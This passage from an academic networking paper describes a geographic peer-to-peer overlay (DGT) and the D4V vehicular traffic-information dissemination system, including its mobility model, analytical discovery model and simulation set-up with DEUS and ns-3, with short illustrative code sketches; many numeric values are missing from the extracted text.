to determine the neighborhood of a generic global position w ∈ w . routing is a distributed process implemented as asynchronous message passing. 
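As an illustration of these definitions, the sketch below computes the great-circle (orthodromic) distance with the haversine formula and filters a local routing table for the peers falling within a region of interest around a target position. The data layout and function names are assumptions made for illustration, not the DGT implementation.

```python
import math

def great_circle_km(lat1, lon1, lat2, lon2):
    """Great-circle (orthodromic) distance between two positions, in km,
    computed with the haversine formula."""
    r = 6371.0  # mean Earth radius in km
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dp = math.radians(lat2 - lat1)
    dl = math.radians(lon2 - lon1)
    a = math.sin(dp / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dl / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))

def peers_within(peers, target, radius_km):
    """Return the peers whose global position lies within radius_km of target.

    peers  : iterable of (peer_id, (lat, lon)) pairs from the local routing table
    target : (lat, lon) of the centre of the region of interest
    """
    lat_t, lon_t = target
    return [(pid, pos) for pid, pos in peers
            if great_circle_km(pos[0], pos[1], lat_t, lon_t) <= radius_km]
```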
by executing the route (p,w,a) operation, a peer forwards to another peer p ∈ p a request for the list of peers that peer p knows to be located in the region a ∈ a, whose center is w ∈ w . thus, a routing strategy can be described as the following (possibly non-deterministic) function: n : p × w × a → p ( ) which returns the neighborhood n (p,w,a), around the geographic position w and within region a, known by peer p. the routing process is based on the evaluation of the region of interest centered in the target position. the idea is that each peer involved in the routing process selects, among its known neighbors, those that are likely to know a large number of peers located inside or close to the chosen region centered at the target point. if a contacted peer cannot find a match for the request, it does return the list of closest peers, taken from its routing table. this procedure can be used both to maintain the peer’s local neighborhood n and to find available peers close to a generic target. regarding the local neighborhood, the general aim of the proposed approach is to provide accurate knowledge of peers that are close to the requesting one (starting from a set of neighbors provided by a bootstrap node, during the overlay network joining phase), together with a reduced set of remote peer references which will be used to forward long range geographic queries. whenever a single active peer in the system wants to contact such an idea recalls granovetter’s theory of weak ties (granovetter, ), stating that human society is formed by small complete graphs whose nodes are strongly connected (friends, colleagues, etc.). such clusters are weakly connected between each other, e.g., a member of a group superficially knows a member of another group. the most important fact is that weak ties are those which make human society an egalitarian small world network, i.e., a giant cluster with small separation degree and no hubs (buchanan, ). other peers in its region (e.g., to provide or search for a service), it does not need to route additional and specific discovery messages to its neighbors (or to a supernode responsible for a specific zone) in order to find peers that are geographically close. instead, it simply reads its neighbors’ list, which is proactively filled with geographic neighbors. our peer neighborhood construction strategy has been inspired by kademlia (maymounkov & mazieres, ), which is used, for example, in recent versions of the emule client, as an alternative to the traditional edonkey protocol (emule project). many of kademlia’s benefits result from its use of the xor metrics to compute the distance between points in the resource identifier space. xor is symmetric, allowing kademlia participants to receive lookup queries from precisely the same distribution of peers contained in their routing tables, which are organized as sets of k-buckets. every k-bucket is a list having picone et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. up to k entries: in other words, each peer in the network has lists containing up to k peers, each list being associated with a given distance from the peer itself. in order to locate peers near a particular identifier, kademlia uses a single routing algorithm from the beginning till the end. peer neighborhood construction in dgt uses the geographic metric, instead of kademlia’s xor metric. 
each peer knows its gp, retrieved with a gps or with other localization technologies (e.g., gsm cell-based localization), and knows a set of real neighbors organized in a specific structure, based on the distances of these neighbors from the peer's gp. the overlay network construction is based on the process described in the following. every peer maintains a set of geo-buckets (gbs), each one being a (regularly updated) list of known peers, sorted by their distances from the gp of the peer itself. gbs can be represented as $K$ concentric circles, with increasing (application-specific) radii $\{R_i\}_{i=1}^{K}$ and thicknesses $\{r_i\}_{i=1}^{K}$, with $R_i = \sum_{j=1}^{i} r_j$. if there is a known peer whose distance is larger than the radius of the outermost circle $R_K$, it is inserted in another list which contains the peers located outside the region covered by the circle model.

each peer in the gb set is characterized by (i) an identifier (id) which uniquely identifies the peer within the dgt; (ii) a gp, with latitude and longitude values retrieved by means of a gps receiver or other positioning systems; (iii) a contact address allowing the identification of the peer in the internet; and (iv) the number of known peers, used to compare two peers which have the same distance. moreover, each peer maintains the set of message types it is interested in.

when a new peer wants to join the network, it sends a join request, together with its gp, to a bootstrap node, which returns a list of references to peers that are geographically close to the peer itself. it is important to emphasize that this information is not updated: referenced peers may have moved away from their initial locations. it is up to the joining peer to check for the actual availability of the listed peers. such an operation is performed when the peer first joins, but also when the peer finds itself to be almost or completely isolated. in these situations (that typically arise when peers enter low-density regions), the peer may send a new join request to the bootstrap node, in order to obtain a list of recently connected peers which may become neighbors.
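a minimal sketch of the geo-bucket structure just described is given below: a known peer is assigned to the first ring whose cumulative radius $R_i$ contains its distance from the local peer, and to the external list otherwise. the class reuses the GeoPeer sketch above, and its names are illustrative assumptions, not the actual library api.

    import java.util.ArrayList;
    import java.util.List;

    // illustrative geo-bucket (gb) container: K concentric rings of thickness r_i,
    // plus one list for peers beyond the outermost radius R_K. hypothetical names.
    public class GeoBuckets {
        private final GeoPeer self;
        private final double[] outerRadiiKm;        // R_i = r_1 + ... + r_i
        private final List<List<GeoPeer>> buckets;   // one list of known peers per ring
        private final List<GeoPeer> external = new ArrayList<>();

        public GeoBuckets(GeoPeer self, double[] thicknessesKm) {
            this.self = self;
            this.outerRadiiKm = new double[thicknessesKm.length];
            this.buckets = new ArrayList<>();
            double sum = 0.0;
            for (int i = 0; i < thicknessesKm.length; i++) {
                sum += thicknessesKm[i];
                outerRadiiKm[i] = sum;
                buckets.add(new ArrayList<>());
            }
        }

        // insert a known peer into the ring matching its distance from the local peer.
        public void insert(GeoPeer peer) {
            double d = GeoPeer.distanceKm(self, peer);
            for (int i = 0; i < outerRadiiKm.length; i++) {
                if (d <= outerRadiiKm[i]) {
                    buckets.get(i).add(peer);
                    return;
                }
            }
            external.add(peer);  // beyond the outermost circle: kept in the external list
        }
    }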
the main procedure used during peer discovery is find nodes(gp), which returns the β peers that are nearest to the specified gp. peer p keeps its neighborhood awareness up to date by periodically applying find nodes to its own global position gp_p. such a procedure (with any target gp) may also be executed upon request from another peer; in that case, peer p searches in the gb related to the requested gp. the final objective of the peer lookup process is to find the α ≤ k peers that are nearest to the selected gp, including newly connected peers, as well as mobile peers that have entered the visibility zone. the lookup initiator starts by picking α peers from its closest non-empty gb, or, if that bucket has less than α entries, it just takes the α closest peers, by extending the lookup to all its gbs. such a peer set is denoted as $C^{(0)} = \{p^{(0)}(1), \ldots, p^{(0)}(\alpha)\}$. the initiator sends parallel find nodes requests, using its gp as target, to the α peers in $C^{(0)}$. each interrogated peer replies indicating β references. the initiator sorts the result list according to the distance from the target position, then picks up the α peers that it has not yet queried and re-sends the find nodes request (with the same target) to them. if a round of find nodes fails to return a peer closer than the closest one already known, the initiator re-sends the find nodes to the k closest peers not already queried. the lookup terminates when the initiator has obtained responses from the k closest peers, or after f cycles, each jth cycle generating an updated set $C^{(j)}$ of nearest neighbors. thus, the number of sent find nodes(gp) messages is f · α + k and depends on the peer spatial density in the region of interest. a peer is allowed to run a new lookup procedure only if the previous one is completed, in order to reduce the number of exchanged messages and to avoid the overlapping of the same type of operations. the general idea is that soon after the bootstrap, or when neighbor peers are highly dynamic, the discovery process period may be very short, and it may increase when the knowledge among active peers becomes sufficiently stable.

any active peer in the network can change its geographic position for many reasons (e.g., the user may be walking, driving, etc.). in order to preserve the consistency of the dgt, each peer has to periodically schedule a maintenance procedure which compensates the network topological changes. the practical usability of a dgt critically depends on the messaging and computational overhead introduced by such a maintenance procedure, whose features and frequency of execution are application-dependent. when an active peer in the network changes its geographic position, it has to send updates of its gp to its neighbors, in order to make their knowledge more accurate. to avoid excessive bandwidth consumption, every peer communicates its position update to neighbors only if the displacement (with respect to the last communicated position) is higher than ϵ (dimension: (km)), as sketched below. if a peer receives a neighbor's update indicating that the new position of the latter is out of its region of interest, the neighbor's reference is removed from the appropriate gb and a remove message is sent to that peer. the dgt allows peers to have accurate knowledge of geographically close neighbors and a limited view of the outer world. however, whenever necessary and with limited incremental computational and transmission costs, a peer can find new peers which are entering the target region.
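a few lines suffice to express this update rule; the sketch below (hypothetical names, reusing the GeoPeer sketch) makes a peer notify its neighbors only when it has moved more than ϵ km from the last communicated position.

    // illustrative sketch of the epsilon-based position update rule. hypothetical names.
    public class PositionUpdater {
        private final double epsilonKm;   // minimum displacement before notifying neighbors
        private GeoPeer lastNotified;     // last position communicated to the neighborhood

        public PositionUpdater(GeoPeer initialPosition, double epsilonKm) {
            this.lastNotified = initialPosition;
            this.epsilonKm = epsilonKm;
        }

        // returns true (and records the position) only if the displacement exceeds epsilon.
        public boolean shouldNotify(GeoPeer currentPosition) {
            if (GeoPeer.distanceKm(lastNotified, currentPosition) > epsilonKm) {
                lastNotified = currentPosition;
                return true;
            }
            return false;
        }
    }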
the described p2p localization scheme represents the core layer of the proposed d4v system, which can discover and inform drivers who may be interested in specific traffic messages or data acquired by vehicle sensors.

d4v system
most vehicular network safety applications need information from a very limited geographic region around the vehicle's current position. this may not be the case for driving comfort applications, such as traffic intensity or traffic jam monitoring, as well as parking discovery (caliskan, graupner & mauve, ) or guidance systems, which distribute information about the traffic status of the entire city or of those regions where the car is located or moving to. the goal of the d4v system, based on the dgt overlay scheme recalled in section 'distributed geographic table', is to provide a reliable and scalable solution for disseminating, in an opportunistic way, information coming from driver's inputs or vehicle sensors, such as, for example, active shock absorbers, cameras, engine, and temperature sensors.

figure: d4v and dgt layers.

in fig. , an illustrative representation of the d4v system, built on top of dgt, is shown. generally speaking, distributing information over long ranges in vehicular applications is a very challenging task in terms of how to gather, transport, and aggregate such information. the reference scenario of this paper is related to the case where the vehicular network and the user are interfaced uniquely through a mobile device. the information that enriches the knowledge base of the car is collected from internal and external data sources, namely vehicle or roadside infrastructure sensors. the on-board intelligence of the car extends, maintains, and disseminates such information by creating a local view of the car's surroundings.

in the literature, different techniques for content dissemination in vsns are described, such as flooding and geocasting (tonguz et al., ; bronsted & kristensen, ), request/reply (zhao & cao, ; wegener et al., ), broadcasting, sharing (seskar et al., ), and beaconing (xu & barth, ; fujiki et al., ). in the d4v system, we combine the dgt scheme with the opportunistic and spatiotemporal dissemination approach proposed by leontiadis & mascolo ( ), which is based on the publish/subscribe paradigm and allows message distribution to all interested receivers in a given region, by keeping messages alive in that region for a specific period of time. owing to its properties, we believe that such an integrated solution fits well with a very dynamic scenario, where users can easily and frequently change their subscription interests according to their planned paths, the current season, their city neighborhood, and other parameters.

the basic d4v message is composed of: a type, for the notification category (for example, the class of traffic events or sensor data); a location, associated with the information; an event range (er), which represents the region that the notification should reach; an expiration time of the event; and a message payload containing, whenever necessary, additional and detailed information about the event. different types of messages can thus be distributed by means of the same dissemination protocol. it is possible to create, for example, a message to warn approaching users about a traffic queue or a dangerous situation, to distribute data extracted from the different sensors of the vehicle, or to notify other users about a free space in a parking area. each user selects the list of message types he/she is interested in, and adds it to his/her peer descriptor, thus allowing other peers to send only appropriate messages, according to the receiver's preferences. when a new message is generated, the publisher picks up from its gbs the closest known peers of the dgt overlay, within the event range, that are interested in the particular information type (by reading the peer descriptor) and sends them the new message. such an optimization, which also avoids notifying the same peer twice, can be obtained at the expense of a small overhead, due to the inclusion in the message of the list of previous recipients. when a notification is received, d4v checks if it matches the user interests or not (in the presence of dynamic subscription) or if it is already known. in the case of new information, the peer adds it to its knowledge base, and distributes it again to known interested peers.
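as a concrete (and purely illustrative) rendering of the message format and of the publisher-side selection step described above, the sketch below defines the five message fields and filters candidate recipients by interest, event range, previous delivery, and expiration; it is a simplification of the behavior described in the text (for instance, interests are passed as a set of peer ids rather than read from full peer descriptors), not the actual d4v implementation.

    import java.util.ArrayList;
    import java.util.List;
    import java.util.Set;

    // illustrative d4v notification: type, location, event range, expiration, payload.
    public class D4VMessage {
        public final String type;             // e.g., traffic information or sensor data
        public final GeoPeer location;         // position associated with the event
        public final double eventRangeKm;      // region the notification should reach
        public final long expirationMillis;    // absolute expiration time of the event
        public final byte[] payload;           // optional detailed information
        public final Set<String> previousRecipients;  // ids already notified

        public D4VMessage(String type, GeoPeer location, double eventRangeKm,
                          long expirationMillis, byte[] payload, Set<String> previousRecipients) {
            this.type = type;
            this.location = location;
            this.eventRangeKm = eventRangeKm;
            this.expirationMillis = expirationMillis;
            this.payload = payload;
            this.previousRecipients = previousRecipients;
        }

        // publisher-side selection: interested, within range, not yet notified, message not expired.
        public List<GeoPeer> selectRecipients(List<GeoPeer> knownPeers,
                                              Set<String> interestedIds, long now) {
            List<GeoPeer> recipients = new ArrayList<>();
            if (now > expirationMillis) {
                return recipients;  // expired notifications are not redistributed
            }
            for (GeoPeer p : knownPeers) {
                boolean interested = interestedIds.contains(p.id);
                boolean inRange = GeoPeer.distanceKm(p, location) <= eventRangeKm;
                boolean alreadyNotified = previousRecipients.contains(p.id);
                if (interested && inRange && !alreadyNotified) {
                    recipients.add(p);
                }
            }
            return recipients;
        }
    }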
when a peer receives the references about a new peer in its region of interest, it checks if in its knowledge base there are notifications, not yet expired, that may be useful for that new peer. if the latter needs such information (a hash-based comparison is performed), the peer provides it. during such a dissemination process, it is necessary to check if some messages have expired and, consequently, to remove them and their references from the peer's knowledge base, thus avoiding the distribution of obsolete notifications.

mobility model
the mobility model is one of the fundamental elements for realistic performance evaluation of simulated v2v and v2i networking applications. in our work, we take into account some ideas proposed by harri, filali & bonnet ( ) and fiore et al. ( ) about the key features that should be included in a vehicular mobility simulator, in order to obtain realistic motion patterns. moreover, our model partially follows the approach of zhou, xu & gerla ( ), where the key idea is to use switch stations (sss), connected via virtual tracks, to model the dynamics of vehicle and group mobility. for example, our simulative analysis considers a square area around the city of parma (italy), with sss inside and outside the city district: a google maps based representation of parma is shown in fig. .

figure: example of simulated dgt-based vsn (in the city of parma, italy).

stations are connected to each other through virtual paths, which have one lane for every direction, speed limitations associated with the street category, and a specific road density limit to model vehicles' speeds in traffic jam conditions. when a new car joins the network, it first associates with a random ss; then, it selects a new ss and starts moving along the connection path between the two sss. such a procedure is repeated every time the car reaches a new ss and has to decide its next destination. each ss has an attraction/repulsion value which influences the user's choice for the next destination station. this value may be the same for each path, in order to allow a random trip selection. a set of parameters is associated with each car, thus affecting macroscopic and microscopic aspects of traffic circulation, like street and highway limitations (i.e., some types of vehicles are forbidden on particular paths), as well as acceleration, deceleration, and speed constraints.

we model different external events which may happen during the traffic simulation and alter drivers' behavior, such as accidents, temporary road works, or bad road surface conditions due to ice, snow, or potholes. we assume that these events can be detected by vehicle sensors. drivers do not only interact with obstacles, but also adapt their behaviors according to their knowledge about their surroundings. for example, they may try to change their paths if they are informed about a traffic jam or an accident slowing or blocking the traffic, and they reduce their speed in proximity of locations characterized by bad surface conditions. we consider a microscopic flow model, where the mobility parameters of a specific car are described with respect to other cars. several approaches take into account, for example, the presence of nearby vehicles when modeling vehicle speed (e.g., the fluid traffic model (ftm) (seskar et al., ; krauss, wagner & gawron, ) and the intelligent driver model (idm) (treiber, hennecke & helbing, )).
in particular, ftm is the most appropriate for our scenario, since it supports different speed limits for different virtual paths and has low computational requirements. in ftm, vehicle speed is a monotonically decreasing function of the vehicular spatial density, forcing lower values when the traffic congestion reaches a critical point. in our case, the desired speed of a vehicle moving along the points of the ith path is computed according to the following equation:

$v_{des} = \max\left[ v_{min},\; v_{max}^{(i)} \left( 1 - \frac{k}{k_{jam}} \right) \right]$ ( )

where: $v_{min}$ is the minimum vehicle speed and depends on the vehicle's characteristics (dimension: (km/h)); $v_{max}^{(i)}$ is the speed limit of the ith path (dimension: (km/h)); $k$ is the current vehicular spatial density of the road (dimension: (vehicles/km)), given by n/l, where n represents the number of vehicles on the road and l is its length in km; and $k_{jam}$ is the vehicular spatial density (dimension: (vehicles/km)) in correspondence to which a traffic jam is detected.

as mentioned before, we also want to model the behavior of a driver in proximity of a road point with bad surface conditions. the idea is that a conscientious driver, knowing that along his/her road there is a potentially dangerous location, reduces the car speed according to the distance from that point. the safe speed $v_{safe}$ is defined by the following equations:

$v_{safe} = \frac{d}{k_1} + k_2$ ( )

$k_1 = \frac{d_{limit}}{v_{des} - v_{min}}$ ( )

$k_2 = v_{min}$ ( )

where: $d$ is the distance between the vehicle and the path location with bad surface conditions (dimension: (km)); $d_{limit}$ is the limiting distance (dimension: (km)) from which the evaluation of the safe speed starts; $k_1$ (dimension: (h)) and $k_2$ (dimension: (km/h)) depend on the desired speed $v_{des}$ (dimension: (km/h)) at the limiting distance and on the minimum speed $v_{min}$ (dimension: (km/h)) near the dangerous location.
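for concreteness, both speed rules can be implemented in a few lines; the sketch below (hypothetical method names, in the same spirit as the previous fragments) computes the ftm desired speed and the safe speed near a bad-surface point, under the stated assumption that $v_{des} > v_{min}$.

    // illustrative implementation of the mobility-model speed rules described above.
    public final class SpeedModel {
        private SpeedModel() {}

        // ftm desired speed: decreases linearly with the density k, floored at vMin.
        public static double desiredSpeed(double vMin, double vMaxPath,
                                          double density, double jamDensity) {
            return Math.max(vMin, vMaxPath * (1.0 - density / jamDensity));
        }

        // safe speed near a bad-surface point at distance d (km), for d <= dLimit:
        // vSafe = d / k1 + k2, with k1 = dLimit / (vDes - vMin) and k2 = vMin.
        public static double safeSpeed(double d, double dLimit, double vDes, double vMin) {
            if (d >= dLimit) {
                return vDes;                     // far enough: no reduction applied
            }
            double k1 = dLimit / (vDes - vMin);  // assumes vDes > vMin
            double k2 = vMin;
            return d / k1 + k2;
        }
    }

with this formulation, the safe speed equals the minimum speed at the dangerous point (d = 0) and smoothly reaches the desired speed at the limiting distance (d = dLimit).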
performance evaluation
we first present an analytical performance evaluation framework of the dgt-based proactive neighbor localization protocol illustrated in section 'distributed geographic table'. the analytical results are confirmed by simulations, showing that the proposed framework is an effective and efficient approach to evaluate the number of discovery steps for highly precise (d4v-instrumental) neighbor localization. we then investigate, through simulations, a d4v-based application which allows vehicles to adapt their routes according to traffic information gathered from other vehicles in the area.

dgt-based proactive localization
assuming that n peers are distributed within a square surface with side of length l (dimension: (km)), the corresponding peer spatial density, denoted as ρ, is $n/l^2$ (dimension: (vehicles/km²)). if peers are static and uniformly distributed over the square surface, ρ is also the local peer spatial density. in the presence of node mobility (but still under the assumption that there are n peers in the square region of interest), the peer distribution is likely to be non-uniform: the corresponding peer spatial density can be heuristically estimated as $\gamma \cdot n/l^2$, where $\gamma \in \mathbb{R}^+$ is a compensation factor to take into account the fact that peers could be locally denser (γ > 1) or sparser (γ < 1) than the average value ρ.

assume that, at a specific time, a peer wants to identify the available geographic neighbors within a circular region of interest. such a region, centered at the peer, is denoted as $R$ and its area is $A$. in general, within the region of interest of a peer there are two classes of neighbors: detectable (i.e., peers which can be detected by one or more other peers) and non-detectable (i.e., peers which cannot be detected by any other peer). assuming that peers are distributed according to a two-dimensional poisson distribution with parameter ρ, the average number of peers in the region $R$ is $n_{tot}^{(R)} = \rho \cdot A$. this is an approximation: owing to node mobility, the local distribution is likely to be non-poisson; however, as we will consider only average values, the poisson approximation will be shown to be accurate. let us denote by $x \in (0, 1)$ the percentage of non-detectable peers in the region $R$ (i.e., there are, on average, $x \cdot n_{tot}^{(R)}$ non-detectable peers). assuming further that the number of detectable peers in $R$ has a poisson distribution with parameter $\rho \cdot A \cdot (1 - x)$, it follows that their average value is $n_{d}^{(R)} = \rho \cdot A \cdot (1 - x)$.

as described in section 'distributed geographic table', during each step of the discovery procedure, a peer picks the closest α known neighbors (if available) and sends them simultaneous find nodes requests centered in the peer's geographic location. the goal of the interrogating peer is to retrieve the detectable peers in its region of interest. if, at the end of an iteration, no new peer is retrieved, the discovery process ends and will be rescheduled according to a specific strategy. in order to evaluate the number of discovered peers at each discovery iteration (without counting the same peer more than once), the α find nodes requests, scheduled at each discovery step, must be taken into account considering not only the intersections between pairs of peers, but also the possible intersections between η-tuples (η ≤ α) of peers originating from the α contacted peers. the total number of such intersections is

$\sum_{i=1}^{\alpha} \binom{\alpha}{i} = 2^{\alpha} - 1.$ ( )

in fig. , an illustrative scenario with α overlapping circular regions (associated with the contacted peers) is shown. since the intersection of α circular regions can be highly varying (depending on their relative positions), we simplify the analysis assuming that adjacent contacted peers are spaced by an angle π/α and are positioned in the center of the corresponding radius of the circular region of interest of the analyzed peer that is performing discovery requests. we denote as $a_j$ the sum of the areas of the intersection regions shared only by the requesting peer and j contacted peers. in fig. , the areas $\{a_1, a_2, a_3\}$ are indicated. such areas can be computed using the matlab library available at (vakulenko); explicit expressions (not shown here for the sake of conciseness) can be derived according to the analysis in fewell ( ).

figure: intersection regions between overlapping circular areas of interest.
under the above assumptions, the average number of new peers discovered after s steps can be written as

$n(s) = \begin{cases} l & s = 0 \\ n(s-1) + \sum_{j=1}^{\alpha} d_j\big(n(s-1)\big) & s > 0 \end{cases}$ ( )

where: $l$ is the initial size of the peer list; $n(0)$ is the average number of initial peers (transferred to the peer of interest); $n(s-1)$ is the number of new peers discovered up to the (s − 1)th step (s ≥ 1); and $d_j\big(n(s-1)\big)$ represents the average number of new peers discovered in the region of area $a_j$ upon querying $n(s-1)$ peers, which can be expressed as follows:

$d_j\big(n(s-1)\big) = \rho \cdot a_j \cdot (1 - x) \cdot b_j\big(n(s-1)\big)$ ( )

where $b_j\big(n(s-1)\big)$ is the probability that no replicas are obtained in the jth intersection between the applicant's region of interest and the regions of interest of the $n(s-1)$ queried peers. this probability depends on: (i) the number of peers that share the same zone (i.e., j) and can answer with the same peer references; and (ii) the average number $n(s-1)$ of known peers at step s − 1; in fact, the number of known peers at each step needs to be taken into account to evaluate potential replicas. considering that the more neighbors a peer already knows, the higher the probability of re-discovering an already known peer, the following heuristic expression for $b_j$ will be shown to allow accurate performance results to be derived:

$b_j\big(n(s-1)\big) = \left( 1 - \frac{n(s-1)}{n_d^{(R)}} \right)^{j}.$ ( )

since j is the number of peers that share the same zone and j is used as the exponent in ( ), the higher j is, the lower $b_j$ is. finally, the average number of newly discovered peers up to step s can be expressed as follows:

$n(s) = n(s-1) + \sum_{j=1}^{\alpha} \rho \cdot a_j \cdot (1 - x) \cdot \left( 1 - \frac{n(s-1)}{n_d^{(R)}} \right)^{j}.$ ( )

note that the recursive analytical computation of {n(s)} stops when a pre-set peer discovery limiting number is reached.

figure: pmn as a function of the discovery step, considering (a) active peers and (b) , active peers.

in fig. , the performance results predicted by the analytical model proposed above are compared with simulation results obtained with deus (described in more detail in section 'd4v performance evaluation'), considering scenarios with (a) peers and (b) , peers. in both cases (a) and (b), peers are distributed within a square surface with side of length l = . km, with an initial peer list size n(0) = l = peers, a limiting number of discovered peers equal to , and x = . . it can be observed that the analytical performance results are very close to the simulation results, so that one can conclude that the accuracy of the analytical framework is satisfactory.

figure: pmn as a function of the discovery step, considering (a) and (b) find nodes requests at each neighborhood discovery step.

in order to investigate the impact of α, in fig. the percentage of missing nodes (pmn) in the gbs of a peer, with respect to those actually present in the area, is shown as a function of the discovery step, considering (a) α = and (b) α = . in both cases, the number of active peers is set to . it can be observed that the agreement between simulation and analytical results is even higher than in fig. . by observing the results in figs. and , it can be concluded that a small number of discovery steps (namely, ) is sufficient, regardless of the value of α, to significantly reduce the pmn.
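the recursion above is straightforward to evaluate numerically; the sketch below (hypothetical names) computes n(s) for a given number of steps, given the intersection areas $a_j$, the density ρ, the non-detectable fraction x, and the initial list size l.

    // illustrative numerical evaluation of the peer discovery recursion described above.
    public final class DiscoveryModel {
        private DiscoveryModel() {}

        // initialListSize: n(0) = l, peers provided by the bootstrap node
        // areasKm2:        a_j, intersection areas shared with exactly j contacted peers
        // rho:             peer spatial density (peers/km^2)
        // x:               fraction of non-detectable peers, in (0, 1)
        // detectableInR:   n_d^(R) = rho * A * (1 - x), detectable peers in the region
        // steps:           number of discovery steps s to evaluate
        public static double discoveredAfter(double initialListSize, double[] areasKm2,
                                             double rho, double x,
                                             double detectableInR, int steps) {
            double n = initialListSize;                       // n(0)
            for (int s = 1; s <= steps; s++) {
                double previous = n;
                double gained = 0.0;
                for (int j = 1; j <= areasKm2.length; j++) {  // alpha = areasKm2.length
                    double bj = Math.pow(1.0 - previous / detectableInR, j);
                    gained += rho * areasKm2[j - 1] * (1.0 - x) * bj;
                }
                n = previous + gained;
            }
            return n;
        }
    }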
d4v performance evaluation
the performance evaluation of d4v has been mostly carried out by means of an extensive simulative analysis, complemented by a preliminary experimental evaluation of a d4v system prototype deployed on the planetlab global testbed. while a thorough performance evaluation of the proposed d4v system would require a wide range of (resource-intensive) on-field experiments, we rely on the fact that discrete event simulations are deemed useful to provide a proof-of-concept in this domain (stojmenovic, ). in particular, we focus on a 4g wireless communication scenario, based on the long-term evolution (lte) technology (cox, ).

simulation methodology
deus is an open source, java-based, general-purpose discrete event simulation tool, which is particularly suitable for the application-level analysis of distributed systems with thousands of nodes, characterized by a high level of churn (node joins and departures) and reconfiguration of connections among nodes (amoretti, agosti & zanichelli, ). on the other hand, ns-3 is a widely known open source tool for the discrete event simulation of internet systems (focusing on the low layers of the protocol stack, e.g., mac and physical), which relies on high-quality contributions of the community to develop new models, to debug or maintain existing ones, and to share results (ns-3 development team). in amoretti et al. ( ), we describe a sound methodology to integrate deus (amoretti, agosti & zanichelli, ) and ns-3 (ns-3 development team), leading to a more accurate performance evaluation of large-scale mobile and distributed systems. the main steps of the co-simulation methodology proposed in amoretti et al. ( ) can be summarized as follows:
1. given a complex system to be simulated, identify the main sub-system types, each one being characterized by specific networking parameters;
2. with ns-3: create detailed simulation models of the sub-systems (i.e., sub-models) and measure their characteristic transmission delays, taking into account both message payloads and proper headers;
3. with deus: simulate the whole distributed system, with refined scheduling of communication events, taking into account the transmission delays computed at step 2.
regarding step 2, we have used ns-3's lena lte-epc package, by modifying the c++ class which creates the logs for the radio link control (rlc) protocol (the version released in january was used; see the lte-epc network simulator reference). the modified class logs a discretized probability density function (pdf) of the rlc packet delay. the latter is then used to generate realistic packet delays in the deus-based simulations, using the well-known inversion method (papoulis, ). for practical implementation purposes, the discretized pdf of the downlink rlc packet delay is approximated by a piecewise constant function, whose numerical inversion is straightforward and computationally inexpensive.
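the inversion method mentioned above can be sketched as follows (illustrative code, not the deus or ns-3 api): given a discretized pdf of the rlc packet delay, the corresponding cdf is inverted by drawing a uniform random number and returning the delay bin in which it falls, with uniform interpolation inside the bin.

    import java.util.Random;

    // illustrative inverse-transform sampler for a piecewise-constant delay pdf.
    // binEdges has length pdf.length + 1 and delimits the delay bins (e.g., in ms).
    public class DelaySampler {
        private final double[] binEdges;
        private final double[] cdf;      // cumulative probabilities, last entry == 1
        private final Random rng = new Random();

        public DelaySampler(double[] binEdges, double[] pdf) {
            this.binEdges = binEdges;
            this.cdf = new double[pdf.length];
            double total = 0.0;
            for (double p : pdf) total += p;
            double cum = 0.0;
            for (int i = 0; i < pdf.length; i++) {
                cum += pdf[i] / total;   // normalize so the cdf ends at 1
                cdf[i] = cum;
            }
        }

        // draws one delay value distributed according to the discretized pdf.
        public double sample() {
            double u = rng.nextDouble();
            for (int i = 0; i < cdf.length; i++) {
                if (u <= cdf[i]) {
                    double lower = binEdges[i];
                    double upper = binEdges[i + 1];
                    return lower + rng.nextDouble() * (upper - lower);  // uniform within the bin
                }
            }
            return binEdges[binEdges.length - 1];  // numerical safety fallback
        }
    }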
we have simulated a d4v-based application deployed across the city of parma, considering a number of vehicles that move over km of realistic paths generated using the google maps api. each simulated vehicle selects a different path and starts moving over it. using the features provided by the google maps api, we have created a simple html & javascript control page, which allows to monitor the time progression of the simulated system, where any peer can be selected to view its neighborhood; a few video demos are publicly available (distributed system group). the simulation covers h of d4v system life ( virtual time units), with sss, virtual paths with bad road surface (due to either ice, water, snow, or potholes), accident events characterized by a poisson arrival process, and different message types to disseminate information about sensed traffic data. simulations with deus have been repeated with different seeds for the random number generator, to obtain narrow confidence intervals. the performance results reported in figs. – are obtained by averaging over the simulation runs, considering the whole set of simulated peers.

the considered simulation set-up is characterized by the dgt configuration which gives the best performance in urban scenarios (according to a previous study (picone, amoretti & zanichelli, a)), summarized in the following using the dgt description formalism defined in section 'distributed geographic table'. each peer has: k = gbs, with the same thickness r = . km; a limiting number of discovered peers equal to ; a region of interest of . km²; and an adaptive discovery period ranging from . min to min, depending on the number of new peers discovered during each iteration step. the discovery period of a peer is an increasing function of the degree of knowledge of its neighborhood, i.e., it increases as the number of newly discovered peers in the same area of interest decreases.

figure: bird's-eye view of the simulated scenario.

the transmission delay of a dgt packet has been computed by simulating with ns-3 the sub-system illustrated in fig. (averaging over simulation runs). to match the previously described dgt configuration (i.e., dgt peers having gbs that cover a circular region of interest with radius equal to km), we consider a square region having side length l = km, with a grid of nr = roads ( in the n-s direction and in the w-e direction) and vehicles running over them (with linear density δ). the total amount of dgt user equipments (ues) can thus be expressed as n = nr · δ · l. parallel roads are spaced by l/ = . km. in the map, there are large buildings with a square footprint, seven floors tall. the nv ues located indoors are randomly placed and evenly divided among the buildings, where nv is the total number of ues in all buildings. the path loss model is ns3::BuildingsPropagationLossModel. on top of each building, exactly in the middle, there is an evolved nodeb (enb), i.e., a base station which serves a subset of the n + nv ues. such a dense deployment of enbs may appear to be quite optimistic, but it represents a realistic scenario for medium-term lte deployments. the configuration of the enbs includes fdd paired spectrum, with resource blocks (rbs) for the uplink (which corresponds to a nominal transmission rate of mbps) and the same for the downlink; this is coherent with currently deployed lte systems. dgt ues use udp to send four types of dgt packets to each other. the first type, called descriptor ( bytes), is for neighborhood consistency maintenance purposes.
